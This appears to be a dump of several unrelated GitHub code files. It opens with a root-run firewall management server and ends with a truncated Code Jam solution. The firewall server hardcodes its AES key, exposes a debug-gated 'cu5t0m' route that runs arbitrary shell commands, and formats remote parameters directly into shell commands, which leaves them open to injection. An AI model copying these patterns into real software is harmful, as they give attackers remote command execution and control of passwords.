PIPE,Popen\n\nIP=\"0.0.0.0\"\nPORT=20777\nDEBUG=False\nAES_KEY=b'5xQLFb4RdA9wqYi2'\nFORMAT = '[%(levelname)s]\\t%(asctime)s : %(message)s'\nLOG_NAME = datetime.datetime.now().strftime('Firewall_Server_%Y_%m_%d_%H.log')\nlogging.basicConfig(filename=LOG_NAME, level = logging.DEBUG, format=FORMAT)\nclass prpcrypt(): \n def __init__(self, key): \n self.key = key \n self.mode = AES.MODE_CBC \n \n def encrypt(self, text):\n cryptor = AES.new(self.key, self.mode, self.key)\n length = 16 \n count = len(text) \n add = (length - (count % length))%length\n text = text + (b'\\0' * add) \n self.ciphertext = cryptor.encrypt(text)\n return b2a_hex(self.ciphertext) \n \n def decrypt(self, text): \n cryptor = AES.new(self.key, self.mode, self.key) \n plain_text = cryptor.decrypt(a2b_hex(text)) \n return plain_text.rstrip(b'\\0')\n \nclass Server():\n def __init__(self,ip,port):\n if not self.is_os_linux() and not self.is_os_windows():\n 
print(\"Please run in linux or windows\")\n sys.exit(-1)\n if self.is_os_linux() and os.geteuid() != 0:\n msg=\"This program must be run as root. Aborting...\" \n logging.info(msg)\n print(msg)\n sys.exit(-1) \n self.ip=ip\n self.port=port\n \n def parse_req(self,string):#purl_path?name1=ZmY=&name2=ZmY=&name3=ZmY=&name4=ZmY=\n logging.info(\"request_string:{}\".format(string))\n path=\"\"\n dict={}\n string = string.decode(\"utf-8\")\n temp = string.split(\"?\")\n path = temp[0]\n try:\n params = temp[1]\n kv_pairs = params.split(\"&\")\n for kv_pair in kv_pairs:\n index = kv_pair.find(\"=\")\n key = kv_pair[:index]\n value = kv_pair[index+1:]\n dict[key]=value\n return path,dict\n except:\n return path,dict\n \n def start_tcp_server(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (self.ip, self.port)\n msg='listening on {0}:{1}'.format(self.ip,self.port)\n print(msg)\n logging.info(msg)\n sock.bind(server_address)\n try:\n sock.listen(5)\n except socket.error as e:\n logging.error(\"fail to listen on port {0}\".format(e))\n sys.exit(1)\n while True:\n client,addr = sock.accept()\n logging.info('connected by {0}'.format(addr))\n data = client.recv(65536) \n if not data: \n continue\n logging.debug(\"recv:{}\".format(data))\n data = self.decrypt(data)\n path,param_dict=self.parse_req(data)\n res=\"Unrecognized command.\"\n if \"getFirewallRules\" == path:#getFirewallRules\n res = self.getFirewall()\n elif \"delAllRules\" == path:#delAllRules?name=n1,n2,n3\n name = \"\"\n if \"name\" in param_dict:\n name = param_dict[\"name\"]\n res = self.delAllRules(name)\n elif \"delRule\" == path:#delRule?direction=In&ip=1.1.1.1&port=80-90&protocol=all&action=REJECT&name=hhh\n try:\n direction = param_dict[\"direction\"]\n ip = param_dict[\"ip\"]\n port = param_dict[\"port\"]\n protocol = param_dict[\"protocol\"]\n action = param_dict[\"action\"]\n name = param_dict[\"name\"]\n res = self.delRule(direction,ip,protocol,port,action,name)\n except Exception as e:\n res=str(e)\n elif \"addRule\" == path:\n #addRule?direction=In&ip=1.1.1.1&port=80:90&protocol=all&action=REJECT&name=hhh\n #addRule?direction=In,In&ip=1.1.1.1,2.2.2.2&port=80:90,80&protocol=all,tcp&action=REJECT,ACCEPT&name=hhh,jjj\n try:\n direction = param_dict[\"direction\"]\n ip = param_dict[\"ip\"]\n port = param_dict[\"port\"]\n protocol = param_dict[\"protocol\"]\n action = param_dict[\"action\"]\n name = param_dict[\"name\"]\n res = self.addRule(direction,ip,protocol,port,action,name)\n except Exception as e:\n res=\"1,{0}\".format(e)\n elif \"changePassword\" == path:\n try:\n if \"username\" in param_dict:\n username = param_dict[\"username\"]\n else:\n username = \"\"\n password = param_dict[\"password\"]\n res = self.changePassword(username,password)\n except Exception as e:\n res=\"1,{0}\".format(e)\n elif \"cu5t0m\" == path and DEBUG:\n try:\n command = param_dict[\"command\"]\n res = self.exec_cmd(command)\n except:\n res=\"1,params not enough in cu5t0m.\"\n logging.info(\"server response:{}\".format(res))\n res=self.encrypt(res)\n #logging.info(\"server response:{}\".format(res))\n client.send(res)\n client.close()\n \n def get_os(self):\n import platform\n current_os = platform.system()\n return current_os\n \n def is_os_windows(self):\n return self.get_os() == \"Windows\"\n \n def is_os_linux(self):\n return self.get_os() == \"Linux\"\n \n def exec_cmd(self,command):\n logging.info(\"executing system command:{}\".format(command))\n #result = os.popen(command)\n #res = result.read().strip()\n 
p = Popen(command,shell=True,stdout = PIPE, stderr = PIPE)\n stdout, stderr = p.communicate()\n try:\n stdout, stderr = stdout.decode(\"utf-8\").strip(), stderr.decode(\"utf-8\").strip()\n except Exception as e:\n stdout, stderr = stdout.decode(\"gbk\").strip(), stderr.decode(\"gbk\").strip()\n logging.info(\"executing system command result:code={0},stdout={1},stderr={2}\".format(p.returncode,stdout,stderr))\n if p.returncode==0:\n return \"0,{0}\".format(stdout)\n else:\n return \"1,{0},{1}\".format(stdout,stderr)\n \n def encrypt(self,string):\n if isinstance(string,str):\n string = string.encode(\"utf-8\")\n pc = prpcrypt(AES_KEY)\n string=pc.encrypt(string)\n return string\n \n def decrypt(self,string):\n if isinstance(string,str):\n string = string.encode(\"utf-8\")\n pc = prpcrypt(AES_KEY)\n string=pc.decrypt(string)\n return string\n \n def win_getFirewall(self):\n from winreg import ConnectRegistry,OpenKey,HKEY_LOCAL_MACHINE,EnumValue\n Registry = ConnectRegistry(None, HKEY_LOCAL_MACHINE)\n RawKey = OpenKey(Registry, \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\")\n result=\"\"\n try:\n i = 0\n while 1:\n name, value, type = EnumValue(RawKey, i)\n if ('RA4'in value and 'App' not in value and 'Desc' not in value and 'Active=TRUE' in value):\n rule=value.split('|')\n direction=''\n ip=''\n port=''\n protocol=''\n action=''\n name=''\n for kv_pair in rule:\n if \"=\" not in kv_pair:\n continue\n key,value = kv_pair.split(\"=\")\n if key == \"RA4\":\n ip_str=value\n ip = value.split(\"/\")[0]\n try:\n import math\n netmasks=value.split(\"/\")[1]\n netmask=netmasks.split(\".\")\n sum = int(netmask[0])*256**3+int(netmask[1])*256**2+int(netmask[2])*256**1+int(netmask[3])*256**0\n padding = 32-math.log(2**32-sum,2)\n ip=ip+\"/\"+str(int(padding))\n except Exception as e:\n pass\n if \"Port\" in key:\n port=value\n if key == \"Protocol\":\n if value=='6':\n protocol='tcp'\n elif value=='17':\n protocol='udp'\n else:\n continue\n if key == \"Action\":\n if value == 'Allow':\n action='ACCEPT'\n elif value == \"Block\":\n action = \"REJECT\"\n else:\n continue\n if key == \"Name\":\n name = value\n if key == \"Dir\":\n direction = value\n if len(direction) and len(ip) and len(port) and len(protocol) and len(action) and len(name):\n result = result +\"{}|{}|{}|{}|{}|{}\\n\".format(direction,ip,port,protocol,action,name)\n i += 1\n except WindowsError as e:\n logging.error(str(e))\n pass\n return \"0,{0}\".format(result.strip())\n \n def linux_getFirewall(self):\n cmd=\"\"\"a=`iptables -L INPUT -n|awk -F ' ' 'BEGIN {count=-2;} {if(count>=0){action[count] = $1;protocol[count]=$2;ip[count]=$4;port[count]=$7;}count++;}; END{for (i = 0; i < NR; i++) if(ip[i]&&port[i]&&protocol[i]&&action[i]){ print \"In\",\"|\",ip[i],\"|\",port[i],\"|\",protocol[i],\"|\",action[i];}}'`;b=`iptables -L OUTPUT -n|awk -F ' ' 'BEGIN {count=-2;} {if(count>=0){action[count] = $1;protocol[count]=$2;ip[count]=$4;port[count]=$7;}count++;}; END{for (i = 0; i < NR; i++) if(ip[i]&&port[i]&&protocol[i]&&action[i]){ print \"Out\",\"|\",ip[i],\"|\",port[i],\"|\",protocol[i],\"|\",action[i];}}'`;echo \"$a\";echo \"$b\";\"\"\"\n lines=self.exec_cmd(cmd)\n return lines\n \n def getFirewall(self):\n lines=\"\"\n if self.is_os_linux():\n lines = self.linux_getFirewall()\n elif self.is_os_windows():\n lines = self.win_getFirewall()\n #In|0.0.0.0|22|tcp|REJECT|2018-07-05 11:22:02\n #Out|0.0.0.0|8888|tcp|REJECT|2018-07-08 14:21:24\n #Out|0.0.0.0|8888|udp|REJECT|2018-07-08 14:21:24\n 
delim=\"\\n\"\n status_code = lines[:2]\n lines=lines[2:].split(delim)\n for i in range(len(lines)):\n for j in range(i+1,len(lines)):\n if (\"tcp\" in lines[i] and (lines[i].replace(\"tcp\",\"udp\")==lines[j])) or (\"udp\" in lines[i] and (lines[i].replace(\"udp\",\"tcp\")==lines[j])):\n lines[i]=lines[i].replace(\"udp\",\"all\").replace(\"tcp\",\"all\")\n lines[j]=\"\"\n lines=status_code+delim.join(lines).replace(delim+delim,delim)\n return lines\n \n def changePassword(self,username,password):\n if len(username)==0:\n if self.is_os_linux():\n cmd=\"passwd --stdin {0}\".format(password)# read new tokens from stdin (root only)\n elif self.is_os_windows():\n cmd=\"\"\"for /F \"delims=\\\\ tokens=2*\" %i in ('whoami') do net user %i {0}\"\"\".format(password)\n else:\n if self.is_os_linux():\n cmd=\"echo {0}:{1}|chpasswd\".format(username,password)\n elif self.is_os_windows():\n cmd=\"\"\"net user {0} {1}\"\"\".format(username,password)\n \n res=self.exec_cmd(cmd)\n return res\n \n def delAllRules(self,name=\"\"):\n if self.is_os_linux():\n res=self.exec_cmd(\"iptables -F INPUT;iptables -F OUTPUT\")\n elif self.is_os_windows():\n cmds=[]\n for n in name.split(\",\"):\n cmds.append(\"netsh advfirewall firewall delete rule name=\\\"{}\\\"\".format(n))\n res=self.exec_cmd(\"&\".join(cmds))\n return res\n \n def delRule(self,direction,ip,protocol,port,action,name):\n direction = direction.split(\",\")\n ip = ip.split(\",\")\n protocol=protocol.split(\",\")\n port=port.split(\",\")\n action=action.split(\",\")\n name = name.split(\",\")\n length = len(direction)\n res=\"\"\n cmds=[]\n if self.is_os_linux():\n for i in range(length):\n if protocol[i]==\"all\" :\n if direction[i]==\"In\":\n cmds.append(\"iptables -D INPUT -s {} -p tcp --dport {} -j {} ; iptables -D INPUT -s {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"iptables -D OUTPUT -d {} -p tcp --dport {} -j {} ; iptables -D OUTPUT -d {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"iptables -D INPUT -s {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"iptables -D OUTPUT -d {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif self.is_os_windows():\n for i in range(length):\n action[i] = \"Allow\" if action[i]==\"ACCEPT\" else \"Block\"\n port[i] = port[i].replace(\":\",\"-\")\n for i in range(length):\n if protocol[i]==\"all\":\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} localport={} protocol=tcp name=\\\"{}\\\" & netsh advfirewall firewall delete rule dir={} remoteip={} localport={} protocol=udp \\\"{}\\\"\".format(direction[i],ip[i],port[i],name[i],direction[i],ip[i],port[i],name[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} remoteport={} protocol=tcp name=\\\"{}\\\" & netsh advfirewall firewall delete rule dir={} remoteip={} remoteport={} protocol=udp name=\\\"{}\\\"\".format(direction[i],ip[i],port[i],name[i],direction[i],ip[i],port[i],name[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} localport={} protocol={} name=\\\"{}\\\"\".format(direction[i],ip[i],port[i],protocol[i],name[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall delete rule dir={} remoteip={} 
remoteport={} protocol={} name=\\\"{}\\\"\".format(direction[i],ip[i],port[i],protocol[i],name[i]))\n else:\n return\n if self.is_os_linux():\n cmd=\";\".join(cmds)\n elif self.is_os_windows():\n cmd=\"&\".join(cmds)\n res=self.exec_cmd(cmd)\n return res\n \n def addRule(self,direction,ip,protocol,port,action,name):\n #try:\n self.delAllRules(name)\n #except:\n # pass\n direction = direction.split(\",\")\n ip = ip.split(\",\")\n protocol=protocol.split(\",\")\n port=port.split(\",\")\n action=action.split(\",\")\n name = name.split(\",\")\n length = len(direction)\n res=\"\"\n cmds=[]\n if self.is_os_linux():\n for i in range(length):\n if protocol[i]==\"all\" :\n if direction[i]==\"In\":\n cmds.append(\"iptables -A INPUT -s {} -p tcp --dport {} -j {} ; iptables -A INPUT -s {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n elif direction==\"Out\":\n cmds.append(\"iptables -A OUTPUT -d {} -p tcp --dport {} -j {} ; iptables -A OUTPUT -d {} -p udp --dport {} -j {}\".format(ip[i],port[i],action[i],ip[i],port[i],action[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"iptables -A INPUT -s {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"iptables -A OUTPUT -d {} -p {} --dport {} -j {}\".format(ip[i],protocol[i],port[i],action[i]))\n elif self.is_os_windows():\n for i in range(length):\n if not len(name[i]):name[i]=\"hhh\"\n action[i] = \"Allow\" if action[i]==\"ACCEPT\" else \"Block\"\n port[i] = port[i].replace(\":\",\"-\")\n for i in range(length):\n if protocol[i]==\"all\":\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} localport={} protocol=tcp name=\\\"{}\\\" action={} & netsh advfirewall firewall add rule dir={} remoteip={} localport={} protocol=udp name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],name[i],action[i],direction[i],ip[i],port[i],name[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} remoteport={} protocol=tcp name=\\\"{}\\\" action={} & netsh advfirewall firewall add rule dir={} remoteip={} remoteport={} protocol=udp name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],name[i],action[i],direction[i],ip[i],port[i],name[i],action[i]))\n else:\n if direction[i]==\"In\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} localport={} protocol={} name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],protocol[i],name[i],action[i]))\n elif direction[i]==\"Out\":\n cmds.append(\"netsh advfirewall firewall add rule dir={} remoteip={} remoteport={} protocol={} name=\\\"{}\\\" action={}\".format(direction[i],ip[i],port[i],protocol[i],name[i],action[i]))\n else:\n return\n if self.is_os_linux():\n cmd=\";\".join(cmds)\n elif self.is_os_windows():\n cmd=\"&\".join(cmds)\n res=self.exec_cmd(cmd)\n return res\n\ndef main():\n server=Server(IP,PORT)\n server.start_tcp_server()\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Hehouhua/firewall_gui_cs","sub_path":"firewall_server.py","file_name":"firewall_server.py","file_ext":"py","file_size_in_byte":18815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38112427307","text":"from numpy import diff\n\n\ndef run():\n print(\"\\nDay 10 - Part A\")\n\n # Each of your joltage adapters is rated for a specific output joltage (your puzzle input). 
Any given adapter\n # can take an input 1, 2, or 3 jolts lower than its rating and still produce its rated output joltage.\n text_input = [int(line.rstrip('\\n')) for line in open(\"Day10/input.txt\")]\n\n # Treat the charging outlet near your seat as having an effective joltage rating of 0. In addition, your\n # device has a built-in joltage adapter rated for 3 jolts higher than the highest-rated adapter in your bag.\n adapters = sorted(text_input + [0, max(text_input) + 3])\n\n # If you use every adapter in your bag at once, what is the distribution of joltage differences between the\n # charging outlet, the adapters, and your device?\n joltage_differences = list(diff(adapters))\n\n # What is the number of 1-jolt differences multiplied by the number of 3-jolt differences?\n print(joltage_differences.count(1) * joltage_differences.count(3))\n","repo_name":"filipbiernat/AdventOfCode_2020_Python","sub_path":"Day10/part_a.py","file_name":"part_a.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33491903147","text":"import matplotlib.pyplot as plt\nfrom colorama import Fore\nprint(Fore.RED +\"............................Welcome you to Compound Interest calculator......................................\")\nstarting_bal = float(input(Fore.GREEN +\"Starting Balance :- \"))\nnumber_of_trade=float( input(Fore.CYAN +\"Total Number of Trade/day :- \"))\npercent=float( input(Fore.CYAN +\"Percent of profitable Trade :- \"))\nintrest_rate_pos = float( input(Fore.CYAN +\"Interest Rate positve :- \"))\nintrest_rate_neg = float( input(Fore.CYAN +\"Interest Rate negative :- \"))\nduration = float(input(Fore.YELLOW +\"Duration :- \"))\nprincipal_graph = []\n\ndef actual_rate():\n \n final_rate = number_of_trade*(((percent) * (intrest_rate_pos)) - ((100-percent)*intrest_rate_neg))\n final_rate = float(final_rate/100)\n return final_rate\n\n\n\ndef compounding(sb,ir,du):\n principal=0\n principal = sb \n print(Fore.RED+\" Compunding started \")\n print(Fore.LIGHTWHITE_EX+\" Interest Rate :- \",ir)\n \n for i in range(du):\n interest= (principal)*ir/100\n interest = round(interest,2)\n principal = principal + interest\n principal =round(principal, 2)\n principal_graph.append(principal)\n print(Fore.GREEN+\"interest:- \",interest,Fore.CYAN+ \" principal:- \",principal)\n \n return principal\n\ntime_du = []\n# actual_rate()\nduration = int(duration)\nfor i in range(duration):\n time_du.append(i+1)\nresult = compounding(starting_bal,actual_rate(),duration) \nprint(Fore.MAGENTA+\"total :- \",result) \n\nplt.bar(time_du, principal_graph,color='green')\n\nfor a,b in zip(time_du, principal_graph): \n plt.text(a, b, str(b))\n\nplt.title(\"calculation Plot\", fontsize=28)\nplt.ylabel(\"principal\", fontsize=18)\n\nplt.xlabel(\"time\", fontsize=18)\n# plt.show() \n","repo_name":"RSM009/calculator","sub_path":"real_earning_calculator.py","file_name":"real_earning_calculator.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2920101498","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : tasks.py\n@Time : 2020/3/16 13:36\n@Author : Flack\n@Email : opencoding@hotmail.com\n@ide : PyCharm\n@project : fastapitutorial\n@description : 描述\n\"\"\"\nfrom datetime import datetime\nfrom invoke import task\n\n\n@task()\ndef d(c):\n \"\"\"\n local task automation debugging tools (fastapi service)\n :param c:\n :return:\n \"\"\"\n 
deploy(c)\n\n\n@task(help={})\ndef deploy(c):\n \"\"\"\n local task automation debugging tools (fastapi service)\n :param c:\n :return:\n \"\"\"\n c.run('echo fastapi service start')\n c.run('echo {}'.format('*' * 100))\n c.run('echo author:flack')\n c.run('echo date:{}'.format(datetime.now()))\n c.run('echo descr:{}'.format('自动化任务调式启动fastapi服务'))\n c.run('echo version:{}'.format('v2.0.1'))\n c.run('echo {}'.format('*' * 100))\n c.run('python worker.py')\n c.run('echo fastapi service stop')\n c.run('echo {}'.format('*' * 100))\n","repo_name":"HeywoodKing/FastAPITutorial","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70065060675","text":"from recognition.actions import library\nimport lark.exceptions\nimport os\nimport os.path\nimport xml.etree.ElementTree as ET\nimport copy\nimport operator\nimport collections\nimport log\nimport recognition.actions.library.stdlib\nfrom recognition.actions import perform\nimport settings\nfrom recognition.actions import variables, perform\nfrom recognition.commands import grammar\nfrom recognition import command_module\nfrom recognition.rules.converter import SrgsXmlConverter\nfrom recognition.rules import astree\nfrom recognition import lark_parser\nfrom communication import pubsub, topics\nfrom common import limited_size_dict\nimport recognition.cache\nimport clargs\n\nDEFAULT_DIRECTORY_SETTINGS = {\n 'recurse': True,\n 'conditions': {},\n}\n\nPRIORITY_FN = operator.attrgetter('priority')\n\nclass CommandModuleController:\n\n def __init__(self, module_loader):\n self.module_loader = module_loader\n self.grammars = limited_size_dict.LimitedSizeDict(size_limit=5)\n self.map_grammar_to_commands = collections.OrderedDict()\n self.command_modules = {}\n self.active_command_modules = {}\n self.map_nodes_to_command_module = {}\n self.namespace = recognition.actions.library.stdlib.Namespace()\n self.grammar_xml_cache = limited_size_dict.LimitedSizeDict(size_limit=10)\n\n def initialize_command_modules(self):\n if settings.settings['clean_cache']:\n recognition.cache.delete_cache()\n recognition.actions.library.stdlib.initialize()\n command_module_cache = recognition.cache.load_cache()\n new_cache = recognition.cache.empty_cache()\n files = self.module_loader.load_files()\n command_modules = {}\n for full_path, text in files.items():\n if full_path.endswith('.speak'):\n if text in command_module_cache['command_modules']:\n cmd_module_json_str = command_module_cache['command_modules'][text]\n cmd_module = recognition.cache.from_text(cmd_module_json_str)\n else:\n try:\n module_ir = lark_parser.parse_command_module(text)\n except (lark.exceptions.UnexpectedCharacters, lark.exceptions.UnexpectedEOF) as e:\n print(f'Error parsing command module {full_path}:\\n{e}')\n print('Continuing...')\n continue\n text_by_line = text.split('\\n')\n cmd_module = command_module.command_module_from_lark_ir(module_ir, text_by_line)\n if 'on_load' in cmd_module.functions:\n namespace = self.get_namespace()\n source = {'command_module': cmd_module, 'type': 'command_module_loaded'}\n action = cmd_module.functions['on_load'].action\n perform.perform_action_from_event(action, namespace, source)\n command_modules[full_path] = cmd_module\n cmd_module.relative_path = os.path.relpath(full_path, self.module_loader.root)\n cmd_module.absolute_path = full_path\n new_cache['command_modules'][text] = recognition.cache.to_json_string(cmd_module)\n 
recognition.cache.save_cache(new_cache)\n return command_modules\n \n def get_active_modules(self, current_window: str):\n active_modules = {}\n for path, cmd_module in self.command_modules.items():\n if cmd_module.is_active(current_window):\n active_modules[path] = cmd_module\n return active_modules\n\n def load_modules(self, current_window, initialize_modules: bool=False):\n previous_active_modules = self.sorted_command_modules(self.active_command_modules)\n if initialize_modules:\n raise NotImplementedError\n self.active_command_modules = self.get_active_modules(current_window)\n command_modules_by_ascending_priority = self.sorted_command_modules(self.active_command_modules)\n namespace = self.get_namespace()\n self.fire_activation_events(previous_active_modules, command_modules_by_ascending_priority, namespace)\n grammar_context = self.build_grammar(command_modules_by_ascending_priority.values())\n if grammar_context is not None:\n self.grammars[grammar_context.uuid] = grammar_context\n grammar_xml, grammar_id = ET.tostring(grammar_context.xml).decode('utf8'), grammar_context.uuid\n if grammar_xml in self.grammar_xml_cache:\n grammar_context.recognition_cache = copy.copy(self.grammar_xml_cache[grammar_xml].recognition_cache)\n self.grammar_xml_cache[grammar_xml] = grammar_context\n pubsub.publish(topics.LOAD_ENGINE_GRAMMAR, grammar_xml, grammar_id)\n\n def build_grammar(self, command_modules_by_ascending_priority) -> grammar.GrammarContext:\n named_utterances, commands, utterance_priority = self.get_active_named_utterances_and_commands(command_modules_by_ascending_priority)\n cycles = self.calculate_named_utterance_cycles(named_utterances)\n if cycles:\n s = \"\" if len(cycles) == 1 else \"s\"\n print(f'Unable to load grammar - found utterance cycle{s}')\n for cycle in cycles:\n print(' -> '.join(cycle))\n print('')\n return\n command_utterances = [cmd.utterance for cmd in commands]\n all_utterances = list(named_utterances.values()) + command_utterances\n node_ids = self.generate_node_ids(all_utterances)\n namespace = self.get_namespace()\n command_contexts = {}\n for cmd in commands:\n variable_tree = variables.RecognitionResultsTree(cmd.utterance, node_ids, named_utterances)\n command_contexts[node_ids[cmd.utterance]] = cmd, variable_tree\n grammar_xml = self.build_grammar_xml(all_utterances, node_ids, named_utterances)\n grammar_context = grammar.GrammarContext(grammar_xml, command_modules_by_ascending_priority, command_contexts, commands, namespace, named_utterances, node_ids, utterance_priority)\n return grammar_context\n\n def sorted_command_modules(self, command_modules):\n sorted_modules = {}\n for path in sorted(command_modules, key=lambda x: (command_modules[x].priority)):\n sorted_modules[path] = command_modules[path]\n return sorted_modules\n\n def get_namespace(self):\n ns = recognition.actions.library.stdlib.namespace.copy()\n for mod in self.active_command_modules.values():\n ns.update(mod.functions)\n return ns\n\n def generate_node_ids(self, utterances):\n node_ids = {}\n for utterance in utterances:\n for node in utterance.walk():\n if node not in node_ids:\n node_ids[node] = f'n{len(node_ids) + 1}'\n return node_ids\n\n def fire_activation_events(self, previous_active_modules, current_active_modules, namespace):\n for path, cmd_module in previous_active_modules.items():\n if path not in current_active_modules and 'on_deactivate' in cmd_module.functions:\n source = {'command_module': cmd_module, 'type': 'command_module_deactivated'}\n action = 
cmd_module.functions['on_deactivate'].action\n perform.perform_action_from_event(action, namespace, source)\n for path, cmd_module in current_active_modules.items():\n if path not in previous_active_modules and 'on_activate' in cmd_module.functions:\n source = {'command_module': cmd_module, 'type': 'command_module_activated'}\n action = cmd_module.functions['on_activate'].action\n perform.perform_action_from_event(action, namespace, source)\n\n def build_grammar_xml(self, all_active_rules, node_ids, named_rules):\n return SrgsXmlConverter(node_ids, named_rules).build_grammar(all_active_rules)\n\n def get_active_named_utterances_and_commands(self, command_modules_by_ascending_priority):\n named_utterances = {}\n named_utterances.update(self.special_rules())\n utterance_priority = {}\n active_commands = []\n for cmd_module in command_modules_by_ascending_priority:\n for name, utterance in cmd_module.named_utterances.items():\n utterance_priority[utterance] = cmd_module.priority\n named_utterances[name] = utterance\n for command in cmd_module.commands:\n utterance_priority[command.utterance] = cmd_module.priority\n active_commands.append(command)\n return named_utterances, active_commands, utterance_priority\n\n def special_rules(self):\n return {'_dictation': astree.Rule()}\n\n def calculate_named_utterance_cycles(self, named_utterances):\n graph = DirectedGraph()\n for name, utterance in named_utterances.items():\n for utterance_piece in utterance.walk():\n if isinstance(utterance_piece, astree.RuleReference):\n graph.add_edge(name, utterance_piece.rule_name)\n return self.cycles_from_graph(graph)\n\n def cycles_from_graph(self, graph):\n nodes_with_cycles = set()\n unvisited = set()\n visiting = set()\n visited = set()\n cycles = []\n for name in graph.adjacency_list:\n unvisited.add(name)\n while unvisited:\n node = unvisited.pop()\n visiting.add(node)\n path = (node,)\n node_cycles = self.detect_node_cycles(graph, node, unvisited, visiting, visited, path)\n cycles.extend(node_cycles)\n return cycles\n\n def detect_node_cycles(self, graph, node, unvisited, visiting, visited, path):\n # node is in visiting, last item in path\n cycles = []\n adjacent_nodes = graph.adjacency_list[node]\n for adj in adjacent_nodes:\n if adj in unvisited: # adjacent is unvisited, recurse down\n unvisited.remove(adj)\n visiting.add(adj)\n child_path = path + (adj,)\n adj_cycles = self.detect_node_cycles(graph, adj, unvisited, visiting, visited, child_path)\n cycles.extend(adj_cycles)\n elif adj in visiting: # found a cycle\n cycle_path = None\n for i, path_node in enumerate(path):\n if path_node == adj:\n cycle_path = path[i:]\n break\n assert cycle_path\n cycles.append(cycle_path + (adj,))\n else: #\n assert adj in visited\n visiting.remove(node)\n visited.add(node)\n return cycles\n\nclass StaticFileCommandModuleLoader:\n\n def __init__(self, root, command_module_file_pattern):\n self.root = root\n self.command_module_file_pattern = command_module_file_pattern\n self.file_cache = limited_size_dict.LimitedSizeDict(size_limit=1000)\n\n def load_files(self):\n directory_contents = {}\n if not os.path.isdir(self.root):\n os.makedirs(self.root)\n directory_contents = self.load_directory(self.root, DEFAULT_DIRECTORY_SETTINGS)\n return directory_contents\n\n def load_directory(self, path: str, parent_directory_settings):\n command_modules = {}\n directories = []\n local_settings = settings.try_load_json_file(os.path.join(path, '.osspeak.json'))\n directory_settings = {**parent_directory_settings, **local_settings}\n 
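# note: in the merge above, keys from the local .osspeak.json override the parent's\n        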
with os.scandir(path) as i:\n for entry in sorted(i, key=lambda x: x.name):\n if entry.name.startswith('.'):\n continue\n if entry.is_file() and entry.name.endswith('.speak') and self.command_module_file_pattern in entry.name:\n path = entry.path\n file = self.file_cache.get(path, CommandModuleFile(path))\n self.file_cache[path] = file\n command_modules[path] = file.contents\n # read files in this directory first before recursing down\n elif entry.is_dir():\n directories.append(entry)\n if directory_settings['recurse']:\n for direntry in directories:\n command_modules.update(self.load_directory(direntry.path, directory_settings))\n return command_modules\n\nclass CommandModuleFile:\n\n def __init__(self, path):\n self.path = path\n self.last_modified = None\n self._contents = None\n\n @property\n def contents(self):\n last_modified = os.path.getmtime(self.path)\n if self._contents is None or last_modified > self.last_modified:\n self.last_modified = last_modified\n with open(self.path) as f:\n self._contents = f.read()\n return self._contents\n\nclass DirectedGraph:\n\n def __init__(self):\n self.adjacency_list = {}\n \n def add_edge(self, from_vertex, to_vertex):\n self.add_vertex(from_vertex)\n self.add_vertex(to_vertex)\n self.adjacency_list[from_vertex].add(to_vertex)\n\n def add_vertex(self, value):\n if value not in self.adjacency_list:\n self.adjacency_list[value] = set()","repo_name":"osspeak/osspeak","sub_path":"osspeak/recognition/commands/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":13267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23570898001","text":"def brStalls(filename):\r\n f=open(filename,'rU')\r\n tc=int(f.readline())\r\n g=open('tdlarge.out','w')\r\n\r\n for i in range(tc):\r\n x,people=list(map(int,f.readline().split()))\r\n nbathRooms=x+2\r\n s='1'+('0'*x)+'1'\r\n l=list(s)\r\n while people!=0:\r\n zeroes=max(s.split('1'),key=len)\r\n maxlen=len(zeroes)\r\n lindex=s.find(zeroes)\r\n mid=maxlen//2\r\n people-=1\r\n if maxlen%2==0:\r\n place=lindex+mid-1\r\n l[place]='1'\r\n ls=l[0:place][::-1].index('1')\r\n rs=l[place+1:].index('1')\r\n s=''.join(l)\r\n else:\r\n place=lindex+mid\r\n l[place]='1'\r\n ls=l[0:place][::-1].index('1')\r\n rs=l[place+1:].index('1')\r\n s=''.join(l)\r\n \r\n g.write(('Case #%d: %d 